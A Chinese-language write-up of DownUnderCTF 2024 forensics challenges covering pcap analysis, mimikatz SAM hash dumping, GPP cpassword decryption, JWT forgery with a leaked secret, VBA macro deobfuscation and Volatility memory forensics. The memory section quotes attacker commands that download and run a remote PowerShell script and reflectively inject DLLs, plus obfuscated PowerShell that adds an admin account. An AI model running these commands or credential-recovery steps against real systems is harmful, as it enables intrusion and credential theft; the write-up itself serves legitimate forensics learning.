DownUnderCTF 2024 - Forensics

Mar10發表於2024-07-07

DownUnderCTF 2024 - Forensics

Baby's First Forensics

他們整個上午都在試圖破壞我們的基礎設施!他們正試圖獲得更多關於我們秘密袋鼠的資訊!我們需要您的幫助,我們已經捕獲了一些他們攻擊我們的流量,您能告訴我們他們使用的是什麼工具及其版本嗎?

注意:將您的答案包裝在 DUCTF{} 中,例如 DUCTF{nmap_7.25}

附件:capture.pcap

image-20240707111653769

Nikto是一個網頁伺服器掃描器

DUCTF{Nikto_2.1.6}

SAM I AM

攻擊者設法在我們的反叛者域控制器上獲得了域管理員!看起來他們設法使用 WMI 使用帳戶登入並轉儲了一些檔案。
您能否重現他們如何使用提供的工件獲得管理員密碼?
將管理員帳戶的密碼放在 DUCTF{} 中,例如 DUCTF{password123!}

附件:samiam.zip

給了SAM和SYSTEM檔案,要求得到管理員密碼,自然可以想到用mimikatz

mimikatz # privilege::debug
ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061

mimikatz # lsadump::sam /sam:\sam.bak /system:\system.bak
Domain : DUCTF-AD
SysKey : a88f47504785ba029e8fa532c4c9e27b
Local SID : S-1-5-21-2461790198-1013503533-1008536141

SAMKey : 848804bda5d876ca7027beeee0efdd7c

RID  : 000001f4 (500)
User : Administrator
  Hash NTLM: 476b4dddbbffde29e739b618580adb1e

RID  : 000001f5 (501)
User : Guest

去cmd5解hash:476b4dddbbffde29e739b618580adb1e,得到!checkerboard1

感覺小老外應該有可以查到的網站不用爆金幣..

DUCTF{!checkerboard1}

Bad Policies

看起來攻擊者設法訪問了反叛分子的域控制器。
你能弄清楚他們是如何從我們的一臺 Outpost 機器中提取這些文物後獲得訪問許可權的嗎?

附件:badpolicies.zip

參考:https://www.cnblogs.com/404p3rs0n/p/15675872.html

還原組策略中儲存的密碼

找到配置檔案Groups.xml

<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="Backup" image="2" changed="2024-06-12 14:26:50" uid="{CE475804-94EA-4C12-8B2E-2B3FFF1A05C4}"><Properties action="U" newName="" fullName="" description="" cpassword="B+iL/dnbBHSlVf66R8HOuAiGHAtFOVLZwXu0FYf+jQ6553UUgGNwSZucgdz98klzBuFqKtTpO1bRZIsrF8b4Hu5n6KccA7SBWlbLBWnLXAkPquHFwdC70HXBcRlz38q2" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="Backup"/></User>
</Groups>

值得注意的是其中的cpassword項,儲存的是加密後的內容:

B+iL/dnbBHSlVf66R8HOuAiGHAtFOVLZwXu0FYf+jQ6553UUgGNwSZucgdz98klzBuFqKtTpO1bRZIsrF8b4Hu5n6KccA7SBWlbLBWnLXAkPquHFwdC70HXBcRlz38q2

加密方式為AES 256,雖然目前AES 256很難被攻破,但是微軟選擇公開了該AES 256加密的私鑰

image-20240707131153962

 4e 99 06 e8  fc b6 6c c9  fa f4 93 10  62 0f fe e8
 f4 96 e8 06  cc 05 79 90  20 9b 09 a4  33 b6 6c 1b

藉助該私鑰,我們就能還原出明文。

還原方式可採用Chris Campbell @obscuresec開源的powershell指令碼Get-GPPPassword.ps1

專案地址:https://github.com/PowerShellMafia/PowerSploit/tree/master/Exfiltration

該指令碼可在域內主機上執行,能夠自動查詢共享資料夾\SYSVOL中的檔案,還原出所有明文密碼

powershell -executionpolicy bypass -file Get-GPPPassword.ps1

這裡只需要得到cpassword的值,可以直接利用如下程式碼進行解密

#!/usr/bin/python2
import sys
from Crypto.Cipher import AES
from base64 import b64decode

if(len(sys.argv) != 2):
  print "decrypt.py <cpassword>"
  sys.exit(0)

key = """4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b""".decode('hex')
cpassword = sys.argv[1]
cpassword += "=" * ((4 - len(cpassword) % 4) % 4)
password = b64decode(cpassword)
out = AES.new(key, AES.MODE_CBC, "\x00" * 16)
out = out.decrypt(password)
print out[:-ord(out[-1])].decode('utf16')

image-20240707132653480

DUCTF{D0n7_Us3_P4s5w0rds_1n_Gr0up_P0l1cy}

emuc2

與所有優秀的民族國家一樣,我們有自己的惡意軟體和 C2 用於進攻性操作。但是有人得到了原始碼,並用它來對付我們!這是我們在一臺膝上型電腦上發現的流量捕獲......

附件:sslkeylogfile.txt 、challenge.pcap

根據sslkeylogfile,聯想到TLS

外部應用程式可以透過 Key Log 解密 TLS 連線。Wireshark 1.6.0 及以上版本可以使用該日誌檔案解密資料包。透過 Wireshark -> Preferences -> Protocols -> TLS -> (Pre)-Master-Secret log file,告訴 Wireshark 去哪裡尋找 Key 檔案。

image-20240707202016861

追蹤TLS,在流34提到了JWT token可能待會用得到

PRI * HTTP/2.0

SM

..............d.....................................`u..h...A.......X..A-...G.lC.K..iy-"e^B.z...f.....S..j....5Ia.".g.M........
u.^E.1..l...).f..F..(7R......K..zJ.B%........*..(.3
....S.*/*..........................@....................................................N.h._..u.b
&=LtA.a..=.J..2.B...P,.m..eLZ7.@...Rd ...Vz.O_.5I-.BV!.=.....v..ru*.@....RKRVO....I.R?......@.......z.c...........O\.58..:......{"error":"Error validating JWT token - No token provided"}

在流23得到大段加密資料,很可疑,追蹤HTTP2 流

image-20240707202723760

顯示了一個 URL 路徑 /api/env ,一會應該也能用到

image-20240707202827192

既然有http2了,都看一下

發現forensics-emuc2-b6abd8652aa4.2024.ductf.dev/api/login,用流量包內的使用者密碼登入

{"username": "jooospeh", "password": "n3v3r-g0nna-g1v3-th3-b1rds-up"}

image-20240707203306615

提示沒有許可權檢視flag,那麼要麼是找到密碼登入管理員使用者,要麼就是偽造管理員使用者登入,想起最早看到的JWT token,考慮偽造

結合剛才找到的/api/env內的大量資料,隨便訪問一個看看,如

https://forensics-emuc2-b6abd8652aa4.2024.ductf.dev/api/env/kMyYN2gsez9DQqovBkX4KwxRgpOAbxgb

image-20240707203847513

那應該暗示其中的某個檔案是有JWT token的,把剛才得到的路徑儲存

["YeIzRgKdWkx6EhyH8FPtQinoUI42yR7B","SENmvOvr1rC4BQQ7ugTi2Mht9UXUFQQH","3b2NQO9CM7ZinEyVNQkwkVx5r684TIwl","AbZ9FbNDzJ5ACbGKJ8ezjdod2Jr4x0iW","eWnjieXEMQ7Bj6tpLluchBBH7sDsCt3M","hLJh9TRNut3rSLWJQ6CsGs3OuNjmfYxb","M5ZU5KLyrjulq7QpLhKiJMwRrAMq3MZq","1awDrBxaMbwAhOcvfyntbliw3qanrSKT","FIJRM8kwWj1ye4JwPHg7IJg7PxJBtoXX","iu19ErtsjrQgTMohSnGJ46iMVai9ONOZ","2ervnWvp24g0pHZ81V3W9j2k0NmrkY1Z","T4yLN35GKLhxTgaykWxdgROCAwIBE3FO","HW8UkDvnQ8HFrTkyLHOIMMwywiTvCwfS","Cc5LKVk8n2N6F5BD9shXDlBX0NYG5RP3","YB64wqRiqblY7Bhk2z03bvwYLF9pk8o8","OxcOm5DyESp49smKwYmb6N9sr2yjZPv3","khmmeFNPFAhizYWKyvYMnLA7GVsJNvDt","Q3aoz6KBVGScMKS1Jfr6ewy9ix8q9elJ","jwbZUL8C5rj7DeuCEKZBGokgEh4ujMk1","LlqhKxf2yh8loi7ydfBBg18QKjDS33H0","kpSKlqhaNIL8g2EgACu3353i1p3Hh2CJ","n9tt6MNRJRoY8SIKqEoZnqxJpZmujQuR","1l4w5VOiIQ4pf7rid49GvvaXkhD5yIcw","ddl17btjos89HSpMlz4w1esNdp1BbPA7","jYyikfLWMl2nwZKLPZOI7yoX6Gsafj6Y","nx65kRioTaH87erafNtKaogarwPZYgn4","CU6ITn3A3r6PI089rdqbldt1MKSBOR8e","AYenVSd8ShOKt7in9tLAUTb1IPRminC4","BWO7KhzutnIAYRNdiUi6s4PMMheBFC4A","HlFqicDoJqA12cmHy8bnZd0GuSSqqL8q","8J71fW0218FzmBkF8ttefJrz7BpVtI8F","9QCWBIwQaNedL5NrTrymVUln0X9zDaPg","WbUwqhFlnuycALJgSSYb0VjeAgNtIhan","4GagZFf0emVWMqVZGuSQ0Wt3oesDqTId","hJgMfU0P4DZoXEQ3jPLmQqYrMcLL6tMq","Ie4Ct3weRbyqVZuU8D5WEJ9WzDaGkUeG","HBQW4v8Jx72LIeSA3gssnxODtUiR12iY","dlPoTSiQQhQW0LArsYjaXOlg5FhCECNX","1cLnEiDa0ZBFZMg0sRnB6uAGssFooEwd","h9ZZhUm8LRlXcTwSyPkhbyeH8WopzgK1","b6dQeUSvK6BaKu6hqGKjac1wljmECerf","vOW0m1zK5Ene3eEFxoYlGBDY6PhMG6Ug","4Hmer55iqHNq4fMbUgLTT96KDsceFHQz","TS9mqDcYUu9DUA1b9QoPqSeLMZFJNCKq","3zzwJVC13tWXVaBSwumerFZX10ZEwSx5","AL7Q1tqteIiAMoDAKLmx3PQ7uCtb1WCy","ggnR5ZzLSVr12T8k7cyRMAdlBuOLOQAr","w9SSZPc1qWUAGWE8pyLeB9XIRO79mzDs","u2YrePZCdoytCV6Eiund5dcubFdq2hPx","JShVnYgvoW5Lim3WL3qlqRMoTBGU4ATF","rnWQN9Hda8uDMoEqSdVGzvEtXuFJRZTT","u6dGg8b4YO8NylRJlTVnURjBxMlRmtVy","sD2esH8RTuqsD23PlfGCE0q5JdjnLb6t","ELfvFcLKnMyCwj7ruRbSkZKghcY4R2k6","xkzsLBLgP6dzDZYeiTzlwFpdsdS53fbg","L3VHzsrMHOPXtxfjsX9IEuMdWXiAN4lA","WGzrln1mR9mAgIYeCkkYZm5RIvdajkAi","9e1Y8jnY3j7Lkf8a03szPcqPqPDSGv6y","yTYSAZPsUbDCZbOg6XYBlFm7q6G4v3aq","rDmj6xnsGnm0MJQHvpuSbSXmkvanFQca","QFNahJX4von8pvpS5cy6bh2tyWGEcJwK","4LulvNMUoxwKcKXZm7DQxGOyZmUDAxn7","OiGiv5uCIyfNlTf0iePAiNe6lX3pVvJ7","nY8G2nYcKhvEJ5s2BD4SHECmTKKn1CSL","1K4qLxDn5gLF6gzcbetXP6HqGpghXmcI","4B4feCWkGFTlsoBI8Nxca380Xyv9sfA6","cDg0B5zh6q632VASxaeXNejqBABNFpWE","jZN0vVGts01Zr0xIJ6o2b6InEolghLr5","D8YzDAIwPFfLxwFcoCZSW02NzAoRM0lo","YCtiLWwcqptffHjTurKWv0zWlm87upmg","iSf2RPy3sdNeP6roA80UkxgqMrkOoXdf","nQD8z2wBoGOyIZ0311jUWAF0YlXsvg41","8ChT1ap67PVswJSBp6l7K8XLB8xlu89t","h83hTYu1lSFrhnMn1YrUxXdhRyy7lITP","oIjgXMJi0VvqTTvEY4G6ys7BjbQD9bpD","sd8CGK9j5eD0G8UUp0UkdgLc7tjxbkom","gSsaLGJVrbCvhXDa2tsgR9tZpzfd7gbS","GMBb01VPPfnMxJJTANYwfYnckBv0tB2w","JcMLJHRDcwmZ7T4OyoKZHg3A952Rbc3L","fLJBKWU3l5o7N1XxxVlG4JwyHCDqhJFY","ABgupVqa3fWHnbF6u4JH2tIzn4nuXf8e","1rJ4C9rcoWaW40fZEGA4vUY11azYLw04","aOLKa8rN9em0kQ0sfLeoRmVXY7L17Il1","6FND9ZASwt4GYHLuoCwFZ6JXYcYHuAh2","PqGpPjPKySbkf9tZkLS2X63xMHCwNUto","JOGVhN50FMGOUVZnkdDnlrO5OxA66hGA","II7JA9CiCbuvUwgxWP4j22iGBHzWg0SB","mQSKE3GIeUfYPgSF9zXKajKRRUCFyXPd"]

整理一下,抓包爆破。

本來以為都是假檔案,報完看長度發現很多都有引數。搜尋關鍵詞JWT直接定位

image-20240707204845468

得到JWT

JWT_SECRET=3gHsCBkpZLi99zyiPqfY/NfFJqZzmNL4BAhYN8rAjRn49baTcnmyGISLD6T58XcWIUYrBfltI2iq2N6OHQSrfqBRFxFta61PvmnfRyn8Ep8T55lvLT8Es62kN3x35Bcb0OZmOGmM/zKf2qadcBq3Nbq1MiIVKJMz4w3JOk4orwFPtSNpNh8uaSQQUNMKTT6cvD9bvRvFNeeHYSPhDFwayPIRr5TJ+BpIRTUTfc1C3WCKoOuXCz2t+ISZo5yYwZ6U5w7NKFTTuDqMP/dXevkVykuntdej55XE3fsCP+UVFUT2JrY+Z9Q1aKTgavQR5smYVn93RlpbFwCoSStoANnoi

生成新的JWT,data來源如下,就是剛才找到登入密碼的流

image-20240707214935061

import time
import jwt

data = {"subject_id": 1, "exp": 1920187883}

JWT_SECRET = "3gHsCBkpZLi99zyiPqfY/NfFJqZzmNL4BAhYN8rAjRn49baTcnmyGISLD6T58XcWIUYrBfltI2iq2N6OHQSrfqBRFxFta61PvmnfRyn8Ep8T55lvLT8Es62kN3x35Bcb0OZmOGmM/zKf2qadcBq3Nbq1MiIVKJMz4w3JOk4orwFPtSNpNh8uaSQQUNMKTT6cvD9bvRvFNeeHYSPhDFwayPIRr5TJ+BpIRTUTfc1C3WCKoOuXCz2t+ISZo5yYwZ6U5w7NKFTTuDqMP/dXevkVykuntdej55XE3fsCP+UVFUT2JrY+Z9Q1aKTgavQR5smYVn93RlpbFwCoSStoANnoi"

encoded = jwt.encode(data, JWT_SECRET, algorithm="HS512")
print(encoded)

在網頁替換JWT令牌後

image-20240707210341720

得到flag

image-20240707212007921

DUCTF{pǝʇɔǝɟuᴉ_sᴉ_ǝlᴉɟ_dᴉz_ǝɥʇ_oʇ_pɹoʍssɐd_ǝɥʇ}

Macro Magic

我們設法從我們的一臺 Outpost 機器中提取了這個 excel 電子表格工件。它在引擎蓋下發生了一些事情。開啟後,我們發現並捕獲了網路上的一些可疑流量。你能找出這個流量是什麼並找到標誌嗎?
注意:您不需要執行或啟用宏,因此請解決。

附件:macromagic.zip

提到了宏,而且提示不需要執行或啟用宏。使用oledump.py分析,它可以不執行宏就能檢視宏程式碼

專案地址:https://github.com/decalage2/oledump-contrib

需要配合 Python 模組OleFileIO_PL

pip install olefile

使用

┌──(root💀kali)-[~/桌面/oledump-contrib]
└─# python2 oledump.py ../Monke.xlsm
A: xl/vbaProject.bin
 A1:       515 'PROJECT'
 A2:       107 'PROJECTwm'
 A3: M   24526 'VBA/Module1'
 A4: m    1158 'VBA/Sheet1'
 A5: m     985 'VBA/Sheet2'
 A6: m    1158 'VBA/ThisWorkbook'
 A7:      4438 'VBA/_VBA_PROJECT'
 A8:      3276 'VBA/__SRP_0'
 A9:       239 'VBA/__SRP_1'
A10:       434 'VBA/__SRP_2'
A11:      3988 'VBA/__SRP_3'
A12:       384 'VBA/__SRP_4'
A13:        66 'VBA/__SRP_5'
A14:       276 'VBA/__SRP_6'
A15:        66 'VBA/__SRP_7'
A16:       602 'VBA/dir'

查詢宏原始碼

python2 oledump.py -s A3 -v ../Monke.xlsm

-s 段號:選擇上分析出的某一段來檢視內容

-v :解壓縮VBA宏

有很多假資料,如

MDAxMTEwMDAgMDAxMTAxMDAgMDAxMDAwMDAgMDAxMTAwMDEgMDAxMTAwMDEgMDAxMTAxMDAgMDAxMDAwMDAgMDAxMTAwMDEgMDAxMTAwMTAgMDAxMTAwMDEgMDAxMDAwMDAgMDAxMTAwMTEgMDAxMTAwMTAgMDAxMDAwMDAgMDAxMTAxMTEgMDAxMTAwMTAgMDAxMDAwMDAgMDAxMTEwMDEgMDAxMTAxMTEgMDAxMDAwMDAgMDAxMTAwMDEgMDAxMTAwMDEgMDAxMTAxMDAgMDAxMDAwMDAgMDAxMTAwMDEgMDAxMTAwMDAgMDAxMTAwMDAgMDAxMDAwMDAgMDAxMTAwMDEgMDAxMTAwMDAgMDAxMTAwMDEgMDAxMDAwMDAgMDAxMTAwMDEgMDAxMTAwMDEgMDAxMTAxMDA=

image-20240707191914073

還有一些解完是FAKEFLAG{DUCTF_Fake_Flag}等等,直接刪去

處理完後得到以下程式碼

Attribute VB_Name = "Module1"

Public Function anotherThing(B As String, C As String) As String
    Dim I As Long
    Dim A As String
    For I = 1 To Len(B)
        A = A & Chr(Asc(Mid(B, I, 1)) Xor Asc(Mid(C, (I - 1) Mod Len(C) + 1, 1)))
    Next I
    anotherThing = A
End Function

Public Function importantThing()
    Dim tempString As String
    Dim tempInteger As Integer
    Dim I As Integer
    Dim J As Integer
    For I = 1 To 5
        Cells(I, 2).Value = WorksheetFunction.RandBetween(0, 1000)
    Next I
    For I = 1 To 5
        For J = I + 1 To 5
            If Cells(J, 2).Value < Cells(I, 2).Value Then
                tempString = Cells(I, 1).Value
                Cells(I, 1).Value = Cells(J, 1).Value
                Cells(J, 1).Value = tempString
                tempInteger = Cells(I, 2).Value
                Cells(I, 2).Value = Cells(J, 2).Value
                Cells(J, 2).Value = tempInteger
            End If
        Next J
    Next I
End Function

Public Function totalyFine(A As String) As String
    Dim B As String
    B = Replace(A, " ", "-")
    totalyFine = B
End Function

Sub macro1()
    Dim Path As String
    Dim wb As Workbook
    Dim A As String
    Dim B As String
    Dim C As String
    Dim D As String
    Dim E As String
    Dim F As String
    Dim G As String
    Dim H As String
    Dim J As String
    Dim K As String
    Dim L As String
    Dim M As String
    Dim N As String
    Dim O As String
    Dim P As String
    Dim Q As String
    Dim R As String
    Dim S As String
    Dim T As String
    Dim U As String
    Dim V As String
    Dim W As String
    Dim X As String
    Dim Y As String
    Dim Z As String
    Dim I As Long
    N = importantThing()
    K = "Yes"
    S = "Mon"
    U = forensics(K)
    V = totalyFine(U)
    D = "Ma"
    J = "https://play.duc.tf/" + V
    superThing (J)
    J = "http://flag.com/"
    superThing (J)
    G = "key"
    J = "http://play.duc.tf/"
    superThing (J)
    J = "http://en.wikipedia.org/wiki/Emu_War"
    superThing (J)
    N = importantThing()
    Path = ThisWorkbook.Path & "\flag.xlsx"
    Set wb = Workbooks.Open(Path)
    Dim valueA1 As Variant
    valueA1 = wb.Sheets(1).Range("A1").Value
    MsgBox valueA1
    wb.Close SaveChanges:=False
    F = "gic"
    N = importantThing()
    Q = "Flag: " & valueA1
    H = "Try Harder"
    U = forensics(H)
    V = totalyFine(U)
    J = "http://downunderctf.com/" + V
    superThing (J)
    W = S + G + D + F
    O = doThing(Q, W)
    M = anotherThing(O, W)
    A = something(O)
    Z = forensics(O)
    N = importantThing()
    P = "Pterodactyl"
    U = forensics(P)
    V = totalyFine(U)
    J = "http://play.duc.tf/" + V
    superThing (J)
    T = totalyFine(Z)
    MsgBox T
    J = "http://downunderctf.com/" + T
    superThing (J)
    N = importantThing()
    E = "Forensics"
    U = forensics(E)
    V = totalyFine(U)
    J = "http://play.duc.tf/" + V
    superThing (J)
    
End Sub

Public Function doThing(B As String, C As String) As String
    Dim I As Long
    Dim A As String
    For I = 1 To Len(B)
        A = A & Chr(Asc(Mid(B, I, 1)) Xor Asc(Mid(C, (I - 1) Mod Len(C) + 1, 1)))
    Next I
    doThing = A
End Function

Public Function superThing(ByVal A As String) As String
    With CreateObject("MSXML2.ServerXMLHTTP.6.0")
        .Open "GET", A, False
        .Send
        superThing = StrConv(.responseBody, vbUnicode)
    End With
End Function

Public Function something(B As String) As String
    Dim I As Long
    Dim A As String
    For I = 1 To Len(inputText)
        A = A & WorksheetFunction.Dec2Bin(Asc(Mid(B, I, 1)))
    Next I
    something = A
End Function

Public Function forensics(B As String) As String
    Dim A() As Byte
    Dim I As Integer
    Dim C As String
    A = StrConv(B, vbFromUnicode)
    For I = LBound(A) To UBound(A)
        C = C & CStr(A(I)) & " "
    Next I
    C = Trim(C)
    forensics = C
End Function

對程式碼主要部分的簡要分析:

  1. 函式 anotherThingdoThing
    • 這兩個函式執行相似的操作,即對兩個字串進行XOR操作。它們遍歷第一個字串的每個字元,將其ASCII值與第二個字串中對應位置(迴圈使用第二個字串)的字元的ASCII值進行XOR操作,然後將結果轉換為字元並拼接起來。
  2. 函式 importantThing
    • 這個函式生成5個隨機數,並將它們放在Excel工作表的第二列中。然後,它對這些隨機數進行排序,並相應地調整第一列中的值。
  3. 函式 totalyFine
    • 這個函式將輸入字串中的所有空格替換為短劃線(-)。
  4. 函式 superThing
    • 這個函式使用MSXML2.ServerXMLHTTP.6.0物件傳送GET請求到指定的URL,並返回響應體的內容(轉換為Unicode字串)。
  5. 函式 something
    • 這個函式將輸入字串的每個字元的ASCII值轉換為二進位制字串,並將這些二進位制字串拼接起來。
  6. 函式 forensics
    • 這個函式將輸入字串轉換為Unicode位元組陣列,然後將每個位元組轉換為字串並拼接起來,每個位元組之間用空格分隔。
  7. 子程式 macro1
    • 這個子程式是程式碼的主要入口點。它呼叫上述函式來執行一系列操作,包括生成隨機數、排序、替換字串中的空格、傳送HTTP請求、轉換字串等。它還開啟一個名為“flag.xlsx”的工作簿,讀取A1單元格的值,並顯示一個訊息框。最後,它使用這些值進行更多的字串操作和HTTP請求。

讓AI重構為python(文心一言的效果還挺好的)

import requests  
import os  
import random  
import openpyxl  
from openpyxl import Workbook  
  
def another_thing(b, c):  
    return ''.join(chr(ord(b[i]) ^ ord(c[(i - 1) % len(c)])) for i in range(len(b)))  
  
def important_thing():  
    wb = openpyxl.Workbook()  
    ws = wb.active  
    for i in range(1, 6):  
        ws[f'B{i}'] = random.randint(0, 1000)  
    values = [(ws[f'B{i}'].value, f'A{i}') for i in range(1, 6)]  
    values.sort()  
    for i, (val, cell) in enumerate(values):  
        ws[cell] = i + 1  
    wb.save('temp.xlsx')  
    return None  
  
def totaly_fine(a):  
    return a.replace(" ", "-")  
  
def do_thing(b, c):  
    return ''.join(chr(ord(b[i]) ^ ord(c[(i - 1) % len(c)])) for i in range(len(b)))  
  
def super_thing(a):  
    response = requests.get(a)  
    return response.text  
  
def something(b):  
    return ''.join(format(ord(c), 'b') for c in b)  
  
def forensics(b):  
    return ' '.join(str(byte) for byte in b.encode())  
  
def macro1():  
    important_thing()  
    k = "Yes"  
    s = "Mon"  
    u = forensics(k)  
    v = totaly_fine(u)  
    d = "Ma"  
    j = f"https://play.duc.tf/{v}"  
    super_thing(j)  
    j = "http://flag.com/"  
    super_thing(j)  
    g = "key"  
    j = "http://play.duc.tf/"  
    super_thing(j)  
    j = "http://en.wikipedia.org/wiki/Emu_War"  
    super_thing(j)  
    important_thing()  
    path = os.path.join(os.getcwd(), 'flag.xlsx')  
    wb = openpyxl.load_workbook(path)  
    value_a1 = wb.sheets[0]['A1'].value  
    print(value_a1)  
    wb.close()  
    f = "gic"  
    important_thing()  
    q = f"Flag: {value_a1}"  
    h = "Try Harder"  
    u = forensics(h)  
    v = totaly_fine(u)  
    j = f"http://downunderctf.com/{v}"  
    super_thing(j)  
    w = s + g + d + f  
    o = do_thing(q, w)  
    m = another_thing(o, w)  
    a = something(o)  
    z = forensics(o)  
    important_thing()  
    p = "Pterodactyl"  
    u = forensics(p)  
    v = totaly_fine(u)  
    j = f"http://play.duc.tf/{v}"  
    super_thing(j)  
    t = totaly_fine(z)  
    print(t)  
    j = f"http://downunderctf.com/{t}"  
    super_thing(j)  
    important_thing()  
    e = "Forensics"  
    u = forensics(e)  
    v = totaly_fine(u)  
    j = f"http://play.duc.tf/{v}"  
    super_thing(j)  
  
# Run the macro  
macro1()

python的可讀性就更高了

    w = s + g + d + f  
    o = do_thing(q, w)  
    m = another_thing(o, w)  

很明顯這一塊是在做異或,w對應的應該就是xor key,回去找相應的數值

s = "Mon" 
g = "key"  
d = "Ma"
f = "gic"

得到key:MonkeyMagic,現在就差密文了

結合宏程式碼中的各種拼接URL,流量包就排上了用場

image-20240707194857872

https://downunderctf.com/84-114-121-32-72-97-114-100-101-114
https://play.duc.tf/80-116-101-114-111-100-97-99-116-121-108
https://downunderctf.com/11-3-15-12-95-89-9-52-36-61-37-54-34-90-15-86-38-26-80-19-1-60-12-38-49-9-28-38-0-81-9-2-80-52-28-19
https://play.duc.tf/70-111-114-101-110-115-105-99-115

試了一下,除了第三條,10進位制轉字元後分別是Try HarderPterodactylForensics

那麼密文應該就是第三條了,長度也比較符合。

編寫解密指令碼

def decode(encoded, key):
    return ''.join(chr(encoded[i] ^ ord(key[(i) % len(key)])) for i in range(len(encoded)))

flag = [11, 3, 15, 12, 95, 89, 9, 52, 36, 61, 37, 54, 34, 90, 15, 86, 38, 26, 80, 19, 1, 60, 12, 38, 49, 9, 28, 38, 0, 81, 9, 2, 80, 52, 28, 19]
key = "MonkeyMagic"

decoded_message = decode(flag, key)
print(decoded_message)

執行得到 Flag: DUCTF{M4d3_W1th_AI_by_M0nk3ys}

Lost in Memory

看起來我們的一名鴯鶓士兵在 Outpost 機器上執行了一些東西,現在它正在做奇怪的事情。作為預防措施,我們採取了記憶體轉儲。你能告訴我們發生了什麼嗎?
這個挑戰有四個部分,可以組合成最終的標誌,每個答案 _ 之間。找到所有四個答案並將它們組合成所有小寫字母的標誌,例如 DUCTF{answer1_answer2_answer3_answer4}DUCTF{malicious.xlsm_invoke-mimikatz_malware.exe-malware2.exe_strong-password123}

  1. 惡意可執行檔案的名稱是什麼? 例如malicious.xlsm
  2. 使用的 powershell 模組的名稱是什麼? 例如invoke-mimikatz
  3. 從惡意可執行檔案執行的兩個檔案的名稱是什麼(按字母順序,中間有 - 和沒有空格)? 例如malware.exe-malware2.exe
  4. 透過 powershell 建立的新帳戶的密碼是什麼? 例如strong-password123

附件:EMU-OUTPOST.zip

先查版本

python2 vol.py -f /root/桌面/EMU-OUTPOST.raw imageinfo

image-20240707220741453

python2 vol.py -f /root/桌面/EMU-OUTPOST.raw --profile=Win7SP1x86 cmdscan 

image-20240707220707444

在命令列看到可以檔名 monkey.doc.ps1,即為第一問的答案

繼續往下翻還有

notepad.exe pid:   3048
Command line : "C:\Windows\System32\notepad.exe" "C:\Users\emu\Downloads\monkey.doc.ps1"

找到對應的程序號

python2 vol.py -f /root/桌面/EMU-OUTPOST.raw --profile=Win7SP1x86 pstree

Name                                                  Pid   PPid   Thds   Hnds Time
-------------------------------------------------- ------ ------ ------ ------ ----
0x8439a030:notepad.exe                             4044   3176      3     78 2024-06-18 10:00:15 UTC+0000

把程序dump下來

python2 vol.py -f /root/桌面/EMU-OUTPOST.raw --profile=Win7SP1x86 memdump -p 4044 --dump-dir=/root/桌面

從剛才的命令分析來看monkey.doc.ps1是透過 powershell 執行的,查詢關鍵詞

strings ../../4044.dmp | grep "powershell" 
powershell.exe
powershell/
powershell.exe
powershell.exe
powershell.exe
powershell/
ly loaded EXE won't kill the powershell process when it exits, it will just kill its own thread.
ly loaded EXE won't kill the powershell process when it exits, it will just kill its own thread.
powershell $PKjAU=  ") )'dd'+'a/ n'+'i'+'mda'+' sro'+'t'+'artsinimda'+' p'+'uorglacol'+' te'+'n;d'+'d'+'a/ 3r'+'uce5-r3'+'pu'+'5'+' nimda resu '+'te'+'n'(( )'x'+]31[dIlLehs$+]1[diLLehs$ (."; .( $Env:CoMsPeC[4,24,25]-JOIn'')(-join (  gi  vaRiaBlE:pKjAU).valUe[-1 .. - ( (  gi  vaRiaBlE:pKjAU).valUe.leNgth) ] )
Reflectively loads a Windows PE file (DLL/EXE) in to the powershell process, or reflectively injects a DLL in to a remote process.
......

這段 PowerShell 指令碼看起來是經過混淆的

問了下文心一言

分析變數賦值:首先,檢視 $PKjAU 變數的賦值。注意字串中的拼接模式,比如 'dd'+'a/' 實際上是 'dda/'

解碼字串:使用 PowerShell 來執行字串解碼。由於字串是從後往前拼接的,你可能需要編寫一個 PowerShell 指令碼來逆序解碼這個字串。

image-20240707223449789

得到 5up3r-5ecur3,即為第四問的答案

現在只得到了第一問和第四問的答案

後面才發現,可以使用 vol2 中的控制檯外掛,因為它為每個命令提供了更詳細的檢視。

python2 vol.py -f /root/桌面/EMU-OUTPOST.raw --profile=Win7SP1x86 consoles 

image-20240707225229852

注意到在powershell有兩個命令,去定位powershell的PID,有好幾個,正確的是1136,如果提取2520的話會少一個dll

python2 vol.py -f /root/桌面/EMU-OUTPOST.raw --profile=Win7SP1x86 pslist

Offset(V)  Name                    PID   PPID   Thds     Hnds   Sess  Wow64 Start                          Exit                          
---------- -------------------- ------ ------ ------ -------- ------ ------ ------------------------------ ---------
0x8449c528 powershell.exe         1136   3176     17      432      1      0 2024-06-18 10:01:08 UTC+0000
0x8452f600 powershell.exe         2520   1136     11      306      1      0 2024-06-18 10:01:35 UTC+0000 

取出powershell的程序

python2 vol.py -f /root/桌面/EMU-OUTPOST.raw --profile=Win7SP1x86 memdump -p 2520 --dump-dir=/root/桌面

轉存為文字

strings ../../1136.dmp > ../../1136.txt

定位關鍵詞New-Object

 {iex (New-Object net.webclient).Downloadstring('http://192.168.57.166/reflective/reflect.ps1'); Invoke-ReflectivePEInjection -PEUrl http://192.168.57.166/documents/emu.dll};Start-Job -ScriptBlock {iex (New-Object net.webclient).Downloadstring('http://192.168.57.166/reflective/reflect.ps1'); Invoke-ReflectivePEInjection -PEUrl http://192.168.57.166/documents/kiwi.dll}

提到了Invoke-ReflectivePEInjection這表明整個攻擊場景與反射性 DLL 注入有關

所以第二問答案為 Invoke-ReflectivePEInjection,第三問為emu.dll-kiwi.dll

完整flag:DUCTF{monkey.doc.ps1_invoke-reflectivepeinjection_emu.dll-kiwi.dll_5up3r-5ecur3}

總結

對我來說題目挺新穎的,趣味性兼併挑戰性

學到了很多工具的使用以及一些細節性的取證分析手法

部分Writeups參考:

https://warlocksmurf.github.io/posts/ductf2024/

https://www.youtube.com/watch?v=86IwT9UDIsk